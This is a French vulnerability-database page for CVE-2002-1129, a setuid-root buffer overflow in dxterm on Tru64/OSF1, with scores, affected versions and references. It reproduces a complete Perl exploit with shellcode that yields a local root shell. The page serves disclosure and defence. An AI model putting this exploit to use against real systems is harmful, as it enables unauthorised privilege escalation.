CVE-2002-1129 : Détail

CVE-2002-1129

0.04%V3
Local
2002-09-24
02h00 +00:00
2016-10-17
11h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Buffer overflow in dxterm allows local users to execute arbitrary code via a long -xrm argument.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 21807

Date de publication : 2002-07-02 22h00 +00:00
Auteur : stripey
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/5746/info The HP Tru64/OSF1 dxterm utility is prone to a locally exploitable buffer overflow condition. This issue is due to insufficient checking of command line input supplied via the "-xrm" parameter. This parameter serves the same purpose as the "-customization" command line parameter, which is also not sufficiently checked. Since this utility is installed setuid root, code execution that results from successful exploitation of this issue will yield root privileges on the system. #!/usr/bin/perl -w # # Tru64 5.1 /usr/bin/X11/dxterm # # stripey (stripey@snosoft.com) - 03/07/2002 # ($offset) = @ARGV,$offset || ($offset = 0); $ret_addr = pack("ll",(0x4001c828+$offset),0x1); $sc .= "\x30\x15\xd9\x43\x11\x74\xf0\x47\x12\x14\x02\x42"; $sc .= "\xfc\xff\x32\xb2\x12\x94\x09\x42\xfc\xff\x32\xb2"; $sc .= "\xff\x47\x3f\x26\x1f\x04\x31\x22\xfc\xff\x30\xb2"; $sc .= "\xf7\xff\x1f\xd2\x10\x04\xff\x47\x11\x14\xe3\x43"; $sc .= "\x20\x35\x20\x42\xff\xff\xff\xff\x30\x15\xd9\x43"; $sc .= "\x31\x15\xd8\x43\x12\x04\xff\x47\x40\xff\x1e\xb6"; $sc .= "\x48\xff\xfe\xb7\x98\xff\x7f\x26\xd0\x8c\x73\x22"; $sc .= "\x13\x05\xf3\x47\x3c\xff\x7e\xb2\x69\x6e\x7f\x26"; $sc .= "\x2f\x62\x73\x22\x38\xff\x7e\xb2\x13\x94\xe7\x43"; $sc .= "\x20\x35\x60\x42\xff\xff\xff\xff"; $buf_a .= pack("l",0x47ff041f)x2048; $buf_a .= $sc; $buf_a .= $ret_addr; exec("/usr/bin/X11/dxterm","-customization",$buf_a);

Products Mentioned

Configuraton 0

Compaq>>Tru64 >> Version 4.0f

Compaq>>Tru64 >> Version 4.0f_pk6_bl17

Compaq>>Tru64 >> Version 4.0f_pk7_bl18

Compaq>>Tru64 >> Version 4.0g

Compaq>>Tru64 >> Version 4.0g_pk3_bl17

Compaq>>Tru64 >> Version 5.0

Compaq>>Tru64 >> Version 5.0_pk4_bl17

Compaq>>Tru64 >> Version 5.0_pk4_bl18

Compaq>>Tru64 >> Version 5.0a

Compaq>>Tru64 >> Version 5.0a_pk3_bl17

Compaq>>Tru64 >> Version 5.1

Compaq>>Tru64 >> Version 5.1_pk3_bl17

Compaq>>Tru64 >> Version 5.1_pk4_bl18

Compaq>>Tru64 >> Version 5.1_pk5_bl19

Compaq>>Tru64 >> Version 5.1a

Compaq>>Tru64 >> Version 5.1a_pk1_bl1

Compaq>>Tru64 >> Version 5.1a_pk2_bl2

Digital>>Osf_1 >> Version 3.0

    Digital>>Osf_1 >> Version 3.0b

      Digital>>Osf_1 >> Version 3.2

        Digital>>Osf_1 >> Version 3.2b

          Digital>>Osf_1 >> Version 3.2c

            Digital>>Osf_1 >> Version 3.2d

              Digital>>Osf_1 >> Version 3.2de1

                Digital>>Osf_1 >> Version 3.2de2

                  Digital>>Osf_1 >> Version 3.2f

                    Digital>>Osf_1 >> Version 3.2g

                      Références

                      http://www.securityfocus.com/bid/5746
                      Tags : vdb-entry, x_refsource_BID
                      http://marc.info/?l=bugtraq&m=103248659816294&w=2
                      Tags : mailing-list, x_refsource_BUGTRAQ